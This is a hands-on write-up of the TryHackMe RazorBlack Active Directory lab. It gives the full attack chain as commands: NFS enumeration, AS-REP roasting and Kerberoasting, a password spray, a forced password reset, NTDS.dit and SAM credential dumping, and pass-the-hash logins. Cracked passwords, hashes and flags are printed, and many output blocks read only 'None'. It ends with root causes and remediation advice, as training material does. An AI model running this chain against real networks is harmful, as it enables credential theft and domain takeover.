This document is a structured security write-up based on hands-on exploitation of the RazorBlack lab on TryHackMe website: https://tryhackme.com/room/raz0rblack

Date: January 20, 2026 Source: TryHackMe — RazorBlack & Personal Hands-On Practice

Summary

The RazorBlack lab features a Windows-based Active Directory environment where initial entry was gained through an insecure NFS (Network File System) share. By mounting the /users share, sensitive employee data was exfiltrated, leading to the discovery of a valid username list. Subsequent Kerberoasting and AS-REP roasting, combined with a password spray and a forced password change for the user sbradley, allowed for lateral movement across SMB shares. After retrieving a protected ZIP file containing a NTDS.dit database backup, an offline credential dump provided the NTLM hash for the user lvetrova, granting WinRM access and ultimately a path to escalate to Administrator by leveraging SeBackupPrivilege on the account xyan1d3.

Technical Overview

1. Discovery

By first, information gathering via Nmap:

nmap -sC -sV -v -p- 10.82.151.164

Result:

None

Domain Name:

raz0rblack.thm

/etc/hosts:

10.82.151.164 raz0rblack.thm
2049/tcp  open  nlockmgr

nlockmgr — Network Lock Manager, service used by Network File System to manage file locking across a network.

Let's check it out:

showmount -e 10.82.151.164

Result:

None

Mount it.

mkdir /mnt/nlockmgr
mount -t nfs 10.82.151.164:/users /mnt/nlockmgr -o nolock
cd /mnt/nlockmgr
None

sbradley.txt:

None

Steven's Flag:

THM{ab53e05c9a98def00314a14ccbfa8104}

employee_status.xlsx:

None
nano usernames.txt

usernames.txt:

sbradley
dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
clin
./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc 10.82.151.164 usernames.txt

Result:

None

users.txt:

lvetrova
sbradley
twilliams
impacket-GetNPUsers raz0rblack.thm/ -dc-ip 10.82.151.164 -usersfile users.txt -format hashcat -outputfile hashes.txt

hashes.txt:

None
hashcat -m 18200 hashes.txt /usr/share/eaphammer/wordlists/rockyou.txt
None

Here we go:

twilliams:roastpotatoes
nxc smb 10.82.151.164 -u 'twilliams' -p 'roastpotatoes'

Result:

[+] raz0rblack.thm\twilliams:roastpotatoes
smbmap -u 'twilliams' -p 'roastpotatoes' -H 10.82.151.164

Result:

None
smbclient //10.82.151.164/NETLOGON -U twilliams%'roastpotatoes'
smbclient //10.82.151.164/SYSVOL -U twilliams%'roastpotatoes'

Nothing interesting there.

Check the password for another users:

crackmapexec smb raz0rblack.thm -u usernames.txt -p roastpotatoes --shares

Result:

[-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

Interesting. Let's change the password for this user.

python3 smbpasswd.py sbradley@10.82.151.164

Result:

None
sbradley:pass12345
nxc smb 10.82.151.164 -u 'sbradley' -p 'pass12345'

Result:

[+] raz0rblack.thm\sbradley:pass12345
smbmap -u sbradley -p 'pass12345' -H 10.82.151.164

Result:

None

In the "trash" directory:

None
mget *
None
zip2john experiment_gone_wrong.zip > ziphash.txt
john ziphash.txt

Here we go:

experiment_gone_wrong.zip:electromagnetismo

The zip file's password:

electromagnetismo
None
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL | tee dump.txt

Clean it up:

cat dump.txt | cut -d ":" -f 4 > clean_dump.txt
None
crackmapexec smb 10.82.151.164 -u usernames.txt -H clean_dump.txt

Result:

[+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d

Ljudmila's Hash:

f220d3988deb3f516c73f40ee16c431d

2. Penetration

evil-winrm -i 10.82.151.164 -u 'lvetrova' -H 'f220d3988deb3f516c73f40ee16c431d'
None
None
Get-Content lvetrova.xml
None
$creds = Import-Clixml -Path .\lvetrova.xml
$creds.GetNetworkCredential().password
None

Ljudmila's Flag:

THM{694362e877adef0d85a92e6d17551fe4}

Kerberoast it:

impacket-GetUserSPNs raz0rblack.thm/lvetrova -dc-ip 10.82.151.164 -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -request

Result:

None
hashcat -m 13100 xyan.txt /usr/share/eaphammer/wordlists/rockyou.txt

Result:

None

Xyan1d3's password:

xyan1d3:cyanide9amine5628

3. Escalation

evil-winrm -i 10.82.151.164 -u 'xyan1d3' -p 'cyanide9amine5628'
$creds = Import-Clixml -Path .\xyan1d3.xml
$creds.GetNetworkCredential().password
None

Xyan1d3's Flag:

THM{62ca7e0b901aa8f0b233cade0839b5bb}
whoami /priv

Result:

None

Xyan has SeBackupPrivilege and SeRestorePrivilege -> download sam.bak and system.bak

Info: Download successful!

impacket-secretsdump -sam sam.bak -system system.bak LOCAL

Result:

None
evil-winrm -i 10.82.151.164 -u 'Administrator' -H '9689931bed40ca5a2ce1218210177f0c'

Success.

None
$creds = Import-Clixml -Path .\root.xml
None

Something wrong. Let's figure it out.

https://gchq.github.io/CyberChef

None

There is hex format.

None

The root Flag:

THM{1b4f46cc4fba46348273d18dc91da20d}
gci -recurse -filter "top*"

Result:

None
None

The way to exit vim is:

:wq

Security Failures & Root Causes Classification

  • Insecure Network Shares — Misconfigured NFS Permissions — High Impact — The /users directory was exported via NFS with insufficient access controls, allowing any unauthenticated network user to mount the drive and harvest internal usernames and documents.
  • Credential Exposure in Backups — Protected Sensitive Files — Critical Impact — A backup of the Active Directory database (ntds.dit) was stored in a ZIP file within a "trash" SMB share; although password-protected, the weak encryption allowed for a brute-force attack, exposing all domain hashes.
  • Weak Account Policy — Password Must Change Status — Medium Impact — The account sbradley was identified with a STATUS_PASSWORD_MUST_CHANGE flag, which allowed an attacker to remotely set a new password via SMB and gain authorized access to further internal shares.
  • Excessive Privileges — SeBackup & SeRestore Privileges — High Impact — The user xyan1d3 was assigned high-level backup privileges; these rights were leveraged to dump the SAM and SYSTEM hives, allowing for a Pass-the-Hash attack to gain full Administrator control.

Remediation Recommendations

  • Audit and Secure NFS Exports by restricting access to specific authorized IP addresses and ensuring that sensitive user directories are not shared publicly without strict authentication.
  • Implement Stronger Encryption for all administrative backups and ensure that sensitive files like ntds.dit are stored in highly restricted, offline, or vaulted locations rather than general-purpose file shares.
  • Enforce Tiered Administration to ensure that service accounts or standard users (like xyan1d3) do not possess dangerous privileges like SeBackupPrivilege unless absolutely necessary for their specific role.
  • Monitor Active Directory for anomalous behavior, such as a sudden surge in Kerberos ticket requests (Kerberoasting) or the unauthorized remote use of the smbpasswd functionality to reset user credentials.

Conclusion

The compromise of the RazorBlack domain demonstrates how minor configuration oversights in peripheral services — like NFS — can provide the leverage needed to topple an entire Active Directory infrastructure. While the attacker began with no credentials, the ability to harvest usernames and exploit a misconfigured "Password Must Change" status created a domino effect. This lab serves as a powerful reminder that internal security relies not just on strong passwords, but on the principle of least privilege and the rigorous protection of sensitive system backups.

Write-up compiled based on TryHackMe RazorBlack (https://tryhackme.com/room/raz0rblack) lab.